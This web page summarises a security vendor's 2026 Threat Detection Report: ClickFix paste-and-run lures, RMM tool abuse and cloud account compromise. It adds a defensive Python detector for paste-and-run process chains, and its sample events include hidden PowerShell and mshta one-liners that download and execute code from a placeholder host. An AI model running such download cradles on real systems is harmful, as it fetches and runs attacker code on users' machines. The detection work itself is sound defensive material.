The 2026 Threat Detection Report is here, arming you and your team with actionable insights into the year’s most prevalent security trends, threats, and MITRE ATT&CK® techniques. Our eighth annual retrospective presents an in-depth analysis of more than 110,000 threats detected across over 4.5 million identities, endpoints, and cloud assets over the past year. This report provides you with a comprehensive view of this threat landscape, along with practical guidance on detection, testing, prevention, and mitigation.
Key findings
As the technology that we rely on to conduct business continues to evolve, so do the threats that we face. Here are some of our key findings:
- AI threats materialize in two ways: Adversaries using AI to develop threats and adversaries attempting to compromise corporate AI systems
- Cloud account compromises continue to soar, and we detected more identity threats than ever.
- Browsers continue to be a critical focal point for adversaries and defenders alike. In addition to targeting information stored within browsers, adversaries commonly deliver payloads via browsers as well.
- RMM tools have become the payload of choice for a wide range of differently motivated adversaries, and are often the payload that follows paste-and-run campaigns.
We also check back on the timeless threats and techniques that are prevalent year-after-year, and explore emerging ones that are worth keeping an eye on. Our Field Guide to Color Bird Threats has been updated with the latest sightings of Red Canary-named threat clusters.
Trends
Since its inception eight years ago, The Threat Detection Report has been anchored by data-driven insights into the most prevalent adversary behaviors we witness on a daily basis. The Trends section allows us to zoom out from our top 10 lists to highlight developments in adversary tradecraft and other patterns that we anticipate making waves in the coming year.
This year’s report covers the AI landscape from two different perspectives: AI-powered threats and threats to AI infrastructure.
We also cover supply chain compromises, infostealers, RMM tool abuse, and much more.
Threats
Our top 10 threats list demonstrates how adversaries have shifted their operations to the browser, with the majority of the top threats either executing from the browser or stealing information stored in it. Most of these threats also employed the increasingly popular paste-and-run technique at some point in 2025.
Half of our top 10 threats are new to the rankings this year, including two trojans that execute malicious commands while also delivering on what they claim to do: JustAskJacky and Tampered Chef.
Two Red Canary-named threats updated their tradecraft significantly in 2025, including number 1 Amber Albatross and number 6 Scarlet Goldfinch.
In addition to the top 10, we also share analysis for featured threat CleanUpLoader.
Techniques
Cloud Accounts tops our list of most prevalent techniques for the second year in a row, thanks to increased attention from adversaries and defenders alike. New to the top 10 list are Data From Cloud Storage and Malicious Copy and Paste (aka paste and run or ClickFix).
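The paste-and-run (ClickFix) technique and the RMM follow-on payload named above lend themselves to a simple process-ancestry detection: the lure coaxes a user into pasting a one-liner into the Run dialog or a terminal, so a script interpreter is spawned by explorer.exe with a download cradle on its command line, and an RMM installer then appears as its descendant. The block below is an added example, not code or detection logic from the report; the event schema, the interpreter and RMM image lists, and the sample events are constructed assumptions to be replaced with your own telemetry and inventory of sanctioned tools.

```python
"""Paste-and-run (ClickFix) detection over process-creation events.

Added example, not from the Threat Detection Report. Field names, the
image lists below, and SAMPLE_EVENTS are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # process image name as reported by the sensor
    parent_image: str   # parent's image name as reported by the sensor
    cmdline: str


# The Run dialog (Win+R) is hosted by explorer.exe, so a pasted one-liner
# shows up as an interpreter whose parent is explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-cradle and obfuscation indicators typical of pasted one-liners.
CRADLE = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|\biex\b|"
    r"downloadstring|frombase64string|-enc(odedcommand)?\b|https?://)"
)

# Assumption: illustrative names of legitimate RMM executables; populate from
# your own environment and exclude tools your IT team actually deploys.
RMM_IMAGES = {"screenconnect.clientsetup.exe", "anydesk.exe", "teamviewer.exe"}


def is_paste_and_run(ev: ProcEvent) -> bool:
    """Interpreter launched from the Run dialog with a cradle on its command line."""
    return (
        ev.parent_image.lower() in RUN_DIALOG_PARENTS
        and ev.image.lower() in INTERPRETERS
        and CRADLE.search(ev.cmdline) is not None
    )


def ancestor_pids(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[int]:
    """Walk the ppid chain; stop on a missing parent or a cycle (pid reuse)."""
    seen: List[int] = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.append(cur.pid)
        cur = by_pid.get(cur.ppid)
    return seen


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) alerts: the pasted interpreter and any RMM descendant."""
    by_pid = {e.pid: e for e in events}
    flagged = {e.pid for e in events if is_paste_and_run(e)}
    alerts = [("paste_and_run", pid) for pid in sorted(flagged)]
    for e in events:
        if e.image.lower() in RMM_IMAGES and flagged.intersection(ancestor_pids(e, by_pid)):
            alerts.append(("rmm_after_paste_and_run", e.pid))
    return alerts


# Constructed sample events: one lure that drops an RMM installer, one
# mshta-based lure, and three benign or out-of-scope launches for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "winlogon.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "powershell.exe", "explorer.exe",
              'powershell -w hidden -c "iex (irm https://example.invalid/v)"'),
    ProcEvent(300, 200, "ScreenConnect.ClientSetup.exe", "powershell.exe",
              "ScreenConnect.ClientSetup.exe /silent"),
    ProcEvent(400, 100, "powershell.exe", "explorer.exe", "powershell -c Get-Date"),
    ProcEvent(500, 100, "AnyDesk.exe", "explorer.exe", "AnyDesk.exe"),
    ProcEvent(600, 50, "powershell.exe", "code.exe",
              'powershell -c "iwr https://example.invalid/a"'),
    ProcEvent(700, 100, "mshta.exe", "explorer.exe", "mshta https://example.invalid/a.hta"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Pid 400 (a plain Get-Date) and pid 500 (AnyDesk started directly by the user) produce nothing, and pid 600 is ignored because its parent is an editor rather than the Run dialog; that last case is the tuning knob, since the same lure pasted into an already-open terminal will have a different parent and needs either a wider parent list or a clipboard-source signal from the sensor.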
Rarely do more than two or three net new techniques make it into our top 10 technique list. Over the last five years, at least one of the 10 most prevalent techniques appeared in 46 percent of all detections, and at least one of the top 20 techniques appeared in 63 percent of detections.
By focusing on these “forever techniques,” you cover the behaviors present in nearly half of everything we detect.
In addition to the top 10, we also share analysis for the Steal Application Access Token technique, which encompasses the many varieties of OAuth consent attacks we’ve seen in the wild.
Explore our new Threat Detection Library
Thousands of defenders visit the Threat Detection Report website all year round, implementing the detection opportunities and mitigation guidance as they run into malicious behaviors in their environments. Our new Threat Detection Library makes it even easier to search for threat and technique pages in a central hub.
Get started
The Threat Detection Report is both a timely read and an evergreen resource that practitioners refer to throughout the year. The web version of the report includes even more technical details into visibility, collection, detection, and testing, with actionable guidance should you run into this behavior in your environment.
If you’re intimidated by the PDF’s page count, don’t fret: the Executive Summary provides high-level takeaways for security leaders and anyone else who’s short on time. To kick things off, we encourage you to flip through the report, share it with your team, and start a discussion about which threats and techniques should be prioritized in your organization’s threat model.
Facts Only
The 2026 Threat Detection Report analyzes over 110,000 threats detected across 4.5 million identities, endpoints, and cloud assets.
AI threats manifest in two forms: adversaries using AI to develop threats and targeting corporate AI systems.
Cloud account compromises and identity threats have increased significantly.
Browsers are a primary focal point for adversaries, used for both data theft and payload delivery.
Remote Monitoring and Management (RMM) tools are frequently used as payloads, often following paste-and-run campaigns.
Half of the top 10 threats in this year’s report are new to the rankings, including the trojans JustAskJacky and Tampered Chef.
Two Red Canary-named threats, Amber Albatross and Scarlet Goldfinch, updated their tradecraft in 2025.
Cloud Accounts is the most prevalent technique for the second consecutive year.
New techniques in the top 10 include Data From Cloud Storage and Malicious Copy and Paste (ClickFix).
Over the past five years, at least one of the top 10 techniques appeared in 46% of all detections.
The report introduces a new Threat Detection Library for centralized access to threat and technique analysis.
The report is available in both PDF and web formats, with the web version offering additional technical details.
Executive Summary
The 2026 Threat Detection Report provides a comprehensive analysis of over 110,000 threats detected across 4.5 million identities, endpoints, and cloud assets in the past year. Key findings highlight the dual emergence of AI threats, both adversaries leveraging AI to develop attacks and adversaries targeting corporate AI systems, as well as a surge in cloud account compromises and identity-based threats. Browsers remain a critical attack vector, with adversaries using them for both data theft and payload delivery. Remote Monitoring and Management (RMM) tools have become a favored payload, often deployed in paste-and-run campaigns. The report also tracks persistent threats like infostealers and supply chain compromises, alongside evolving techniques such as malicious copy-and-paste (ClickFix) and OAuth token theft. Notably, half of the top 10 threats are new, including trojans like JustAskJacky and Tampered Chef, while established threats like Amber Albatross and Scarlet Goldfinch have updated their tradecraft. The report emphasizes "forever techniques," led by Cloud Accounts; over the last five years at least one of the top 10 techniques appeared in 46 percent of all detections, and the report offers actionable guidance for detection, prevention, and mitigation. A new Threat Detection Library centralizes resources for defenders, making it easier to search for threat and technique analysis.
The report serves as both a timely snapshot of the current threat landscape and an evergreen resource for security practitioners. It balances high-level insights for executives with technical details for operational teams, encouraging organizations to prioritize threats based on their unique risk profiles. While the focus remains on data-driven trends, the inclusion of emerging threats and updated tradecraft underscores the dynamic nature of cybersecurity challenges.
Full Take
The 2026 Threat Detection Report presents a compelling narrative about the evolving cybersecurity landscape, grounded in empirical data and actionable insights. At its strongest, the report excels in translating complex threat intelligence into practical guidance, bridging the gap between high-level trends and operational realities. The emphasis on "forever techniques," at least one of which appears in nearly half of all detections, highlights a pragmatic approach to risk reduction, while the inclusion of emerging threats like AI-powered attacks and RMM tool abuse demonstrates foresight. The report’s dual focus on adversary innovation (e.g., paste-and-run campaigns) and persistent weak points (e.g., browser-borne payload delivery and credential theft) provides a balanced view of the threat environment.
However, the narrative leans heavily on the authority of data volume (110,000 threats, 4.5 million assets) and proprietary naming conventions (e.g., Red Canary’s "Color Bird" threats), which could subtly reinforce a sense of inevitability or insider expertise. The framing of AI threats as a dual-pronged problem—adversaries using AI and targeting AI—risks oversimplifying a nuanced issue, potentially obscuring the broader systemic risks of AI integration in security infrastructure. The report’s structure, while comprehensive, may also inadvertently prioritize novelty (e.g., new threats in the top 10) over deeper structural vulnerabilities, such as the persistent reliance on legacy systems or human factors in security failures.
Rooted in a paradigm of adaptive defense, the report assumes that threat intelligence, when properly disseminated, can outpace adversary innovation. Yet, it leaves unexamined the paradox of detection: as defenders improve, adversaries evolve, creating an arms race that may disproportionately benefit security vendors over end-users. The second-order implications are significant—organizations may over-invest in reactive measures (e.g., detecting paste-and-run campaigns) while underestimating the human and organizational factors that enable such attacks. Who benefits? Security firms and consultants, certainly, but also adversaries who exploit the gaps between detection and mitigation.
Bridge questions: How might the focus on "forever techniques" blind organizations to systemic vulnerabilities that don’t fit neatly into MITRE ATT&CK frameworks? What would it look like to measure the effectiveness of threat intelligence not just by detection rates, but by reductions in actual harm? And if AI is both a tool for attackers and a target, how can defenders avoid the trap of fighting the last war while the next one is already underway?
Counterstrike scan: A coordinated influence campaign pushing this narrative would likely amplify the urgency of emerging threats (e.g., AI, RMM abuse) to drive demand for security products, while downplaying structural issues like poor identity management or legacy system risks. The actual content aligns with this pattern in its emphasis on novelty and data volume, but it stops short of overt fear-mongering or product pitches, maintaining a focus on actionable intelligence. The alignment is partial but not malicious—more a reflection of industry incentives than manipulation.